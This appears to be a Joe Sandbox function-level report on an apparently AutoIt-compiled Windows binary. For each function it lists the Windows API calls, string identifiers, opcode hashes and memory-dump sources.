                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Window$DestroyMove
                    • String ID: static
                    • API String ID: 2139405536-2160076837
                    • Opcode ID: b81a0d2fa945a05e2dc49ea17a9eaf8aa66a62ac9255a2fce463573b76d8dc59
                    • Instruction ID: 85a9f8ac448613c13bd1b3cb306105f699c4a667dc42ad2f58c57e8adbb548b9
                    • Opcode Fuzzy Hash: b81a0d2fa945a05e2dc49ea17a9eaf8aa66a62ac9255a2fce463573b76d8dc59
                    • Instruction Fuzzy Hash: 61319071200208AADB509F34CC40BFB77B8FF48720F108519F9A987190CB71AD51DB61
                    Function 00CD2D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00CD2E00
                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00CD2E3B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: InfoItemMenu_memset
                    • String ID: 0
                    • API String ID: 2223754486-4108050209
                    • Opcode ID: 728f7374f730c466d90f594311af77c448962c01a18de0aef3a750105a98891a
                    • Instruction ID: e319ed9b6ba67afaddfac5a371c3b79e6af82574e47153ce4bc4749c012160a8
                    • Opcode Fuzzy Hash: 728f7374f730c466d90f594311af77c448962c01a18de0aef3a750105a98891a
                    • Instruction Fuzzy Hash: 8D310631600305ABEB248F48C885BAEBBB9FF15341F14442FEA95D73A1D7709B40DB50
                    Function 00CF6943 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00CF69D0
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00CF69DB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID: Combobox
                    • API String ID: 3850602802-2096851135
                    • Opcode ID: e673459df4eb0ec1f33afcf66dd6298e75814c02000da4313b53fae9eb52afd6
                    • Instruction ID: ed9759d7ada5d41f47dc4b4f8c00105cc2824c7ad9c7dd1f9ceeccdd9738760f
                    • Opcode Fuzzy Hash: e673459df4eb0ec1f33afcf66dd6298e75814c02000da4313b53fae9eb52afd6
                    • Instruction Fuzzy Hash: 2D11B27160020C7FEF519F24DC80FBF376AEB993A4F114129FA689B290D6B19E5187A1
                    Function 00CF6E76 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C71D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C71D73
                      • Part of subcall function 00C71D35: GetStockObject.GDI32(00000011), ref: 00C71D87
                      • Part of subcall function 00C71D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C71D91
                    • GetWindowRect.USER32(00000000,?), ref: 00CF6EE0
                    • GetSysColor.USER32(00000012), ref: 00CF6EFA
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                    • String ID: static
                    • API String ID: 1983116058-2160076837
                    • Opcode ID: bbf1d0542dc91ff292024fb860073f858acbe923ca8b3b34f41a5d6796f2fd8a
                    • Instruction ID: 9cc2409fc40bc3f651117359c6d0375b1eac90229db6e597c53d6c6502a98a81
                    • Opcode Fuzzy Hash: bbf1d0542dc91ff292024fb860073f858acbe923ca8b3b34f41a5d6796f2fd8a
                    • Instruction Fuzzy Hash: C8215972610209AFDB04DFA8CC45AFA7BB8FB08314F004628FE55D3250D734E861EB61
                    Function 00CF6B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetWindowTextLengthW.USER32(00000000), ref: 00CF6C11
                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00CF6C20
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: LengthMessageSendTextWindow
                    • String ID: edit
                    • API String ID: 2978978980-2167791130
                    • Opcode ID: ba3c843a4861d5a0d003db8e629d542551ee213fc4dda88ad233aa271bd5f62d
                    • Instruction ID: 4b5394df2132df32115b499d20f4185a7259a2ab01c296c6601df692b115d5f9
                    • Opcode Fuzzy Hash: ba3c843a4861d5a0d003db8e629d542551ee213fc4dda88ad233aa271bd5f62d
                    • Instruction Fuzzy Hash: 0B116A7150020CABEB508F64DC41AFA3B69EF14368F604728FAB5D71E0C775DC91AB62
                    Function 00CD2E9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00CD2F11
                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00CD2F30
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: InfoItemMenu_memset
                    • String ID: 0
                    • API String ID: 2223754486-4108050209
                    • Opcode ID: 3f4db61f6dbf363ea43883736c6caab09b68ca01a7ddf08c8a9a2bd522df9269
                    • Instruction ID: c066ba081c7b27eb3a45440b0a2c9e025ffa32bbf288f34463b6cc1bdbc3f907
                    • Opcode Fuzzy Hash: 3f4db61f6dbf363ea43883736c6caab09b68ca01a7ddf08c8a9a2bd522df9269
                    • Instruction Fuzzy Hash: 1A11C831901224ABDB21DBD8DC44BAD77B9EB25310F1444BBEA64E73A0D770EE05C7A5
                    Function 00CE24CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                    Download Yara Rule
                    APIs
                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00CE2520
                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00CE2549
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Internet$OpenOption
                    • String ID: <local>
                    • API String ID: 942729171-4266983199
                    • Opcode ID: cc908c56ded0f11a9416dfa029041b71a1e5bf76b04076529e8170805d342180
                    • Instruction ID: cc1bd64a533fae5f8ed01ce565c25116e1def7d2fdb6648f74be91a721e09ba7
                    • Opcode Fuzzy Hash: cc908c56ded0f11a9416dfa029041b71a1e5bf76b04076529e8170805d342180
                    • Instruction Fuzzy Hash: AB110EB01022A5BEDB248F638C99FBBFFACFF06351F10812AF91546040D2706A81DAF0
                    Function 00CE80A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00CE830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00CE80C8,?,00000000,?,?), ref: 00CE8322
                    • inet_addr.WS2_32(00000000), ref: 00CE80CB
                    • htons.WS2_32(00000000), ref: 00CE8108
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ByteCharMultiWidehtonsinet_addr
                    • String ID: 255.255.255.255
                    • API String ID: 2496851823-2422070025
                    • Opcode ID: 17e8197be875d7d8a1d3098282e49d481d2e241bbf989f6db40964ae91bb9541
                    • Instruction ID: a4f4f86b5712a950192a66dcad6343f7c32c1de554ec02cb5e4ce61231bf655f
                    • Opcode Fuzzy Hash: 17e8197be875d7d8a1d3098282e49d481d2e241bbf989f6db40964ae91bb9541
                    • Instruction Fuzzy Hash: D811E135600249ABDB20AF65CC86FFDB334FF04320F10852BE92997292DB72A809D691
                    Function 00CC92E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C77F41: _memmove.LIBCMT ref: 00C77F82
                      • Part of subcall function 00CCB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00CCB0E7
                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00CC9355
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ClassMessageNameSend_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 372448540-1403004172
                    • Opcode ID: a2a6e06032481e066e5f21e6774854d6b62d3cbf62bc663b9c9bc9e57833bf3b
                    • Instruction ID: c107746754592d03548c972b6c015df0bf584fc928c201baea4e7fe1cb7fad27
                    • Opcode Fuzzy Hash: a2a6e06032481e066e5f21e6774854d6b62d3cbf62bc663b9c9bc9e57833bf3b
                    • Instruction Fuzzy Hash: 5701F571A05218ABCB04EBA0CC96DFE7769FF06320B14061DF832572D1DB31590CE760
                    Function 00CC91DF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C77F41: _memmove.LIBCMT ref: 00C77F82
                      • Part of subcall function 00CCB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00CCB0E7
                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 00CC924D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ClassMessageNameSend_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 372448540-1403004172
                    • Opcode ID: 10bb5dd55322293f138eea1110981feb8baaff0eaa7f9d95d1d2931a838cb1a2
                    • Instruction ID: f2c63138bbb552960c991a7f26b988cc6b6869d5d62138ea16056ff9c98f487b
                    • Opcode Fuzzy Hash: 10bb5dd55322293f138eea1110981feb8baaff0eaa7f9d95d1d2931a838cb1a2
                    • Instruction Fuzzy Hash: 3D0171B1E411086BCB04EBA0C996EFE73A8DF15300F240129F95667281EA256F1CA672
                    Function 00CC9264 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C77F41: _memmove.LIBCMT ref: 00C77F82
                      • Part of subcall function 00CCB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00CCB0E7
                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 00CC92D0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ClassMessageNameSend_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 372448540-1403004172
                    • Opcode ID: 5fd6b0b71a43c27abff9513d973a8d6ad011716dabb59726b7da709fbadd53cb
                    • Instruction ID: 48b8fcba0289b98db246651311f8171a17996f04c36d268ffdd4529fa091512b
                    • Opcode Fuzzy Hash: 5fd6b0b71a43c27abff9513d973a8d6ad011716dabb59726b7da709fbadd53cb
                    • Instruction Fuzzy Hash: 7801A2B1E411087BCB04EAA0C996FFFB7ACDF11310F244169F856A32D2DA215F1CA276
                    Function 00CD51CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ClassName_wcscmp
                    • String ID: #32770
                    • API String ID: 2292705959-463685578
                    • Opcode ID: 8aed8b90604aea4e5d613c8686b51a912798eee6eaa47558fe15d33b72851d6d
                    • Instruction ID: d88a6ff94a1f4ef362cd044b73eb2ee584640dd065f1067b7e1517800d2df0ef
                    • Opcode Fuzzy Hash: 8aed8b90604aea4e5d613c8686b51a912798eee6eaa47558fe15d33b72851d6d
                    • Instruction Fuzzy Hash: 98E06872A0032C6BE720AA99AC49FA7F7ACEF40731F00006BFD10D3140E6609A09CBE1
                    Function 00CC81BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                    Download Yara Rule
                    APIs
                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00CC81CA
                      • Part of subcall function 00C93598: _doexit.LIBCMT ref: 00C935A2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Message_doexit
                    • String ID: AutoIt$Error allocating memory.
                    • API String ID: 1993061046-4017498283
                    • Opcode ID: e55d6413561752f48056c4a6a9fc1389bc647ffe304c788e450d09031f14cbac
                    • Instruction ID: 85abf45955f7c8769c2b1052d9e9a0d03f733867642938201b8de24fc5662eef
                    • Opcode Fuzzy Hash: e55d6413561752f48056c4a6a9fc1389bc647ffe304c788e450d09031f14cbac
                    • Instruction Fuzzy Hash: 8AD05B323C535836D61432A56C0BFCE75884F15B55F544015FB0C955D38ED2998692ED
                    Function 00CAB511 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00CAB564: _memset.LIBCMT ref: 00CAB571
                      • Part of subcall function 00C90B84: InitializeCriticalSectionAndSpinCount.KERNEL32(00D35158,00000000,00D35144,00CAB540,?,?,?,00C7100A), ref: 00C90B89
                    • IsDebuggerPresent.KERNEL32(?,?,?,00C7100A), ref: 00CAB544
                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00C7100A), ref: 00CAB553
                    Strings
                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00CAB54E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                    • API String ID: 3158253471-631824599
                    • Opcode ID: 99490e665e7ddb5c0392e32bd8d19a492dbbbb7dfa51836d23a28ce09b3a08db
                    • Instruction ID: 23bf89b84eff253226b08e9e73d0792c10371e3d9c716a2b74949dd9b71679fe
                    • Opcode Fuzzy Hash: 99490e665e7ddb5c0392e32bd8d19a492dbbbb7dfa51836d23a28ce09b3a08db
                    • Instruction Fuzzy Hash: C6E06DB06003128FD720DF28E5083967BE0EF00718F14892CF486C2362EBB5D848CB61
                    Function 00CF5BEB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                    Download Yara Rule
                    APIs
                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00CF5BF5
                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00CF5C08
                      • Part of subcall function 00CD54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00CD555E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: FindMessagePostSleepWindow
                    • String ID: Shell_TrayWnd
                    • API String ID: 529655941-2988720461
                    • Opcode ID: 75b73de3f7949faf7f7cc889eea472a0987bdca44375c06461bb7a36cd5aee68
                    • Instruction ID: c44a38dc4f46a79be5e9eaf90d7dbaa4f3ba8377f6a95399c7ee2d9a27d194ea
                    • Opcode Fuzzy Hash: 75b73de3f7949faf7f7cc889eea472a0987bdca44375c06461bb7a36cd5aee68
                    • Instruction Fuzzy Hash: 85D0C931388311BBE774AB70AC0BFEB6A14EF10B61F000829B755AA2D0D9E49805C651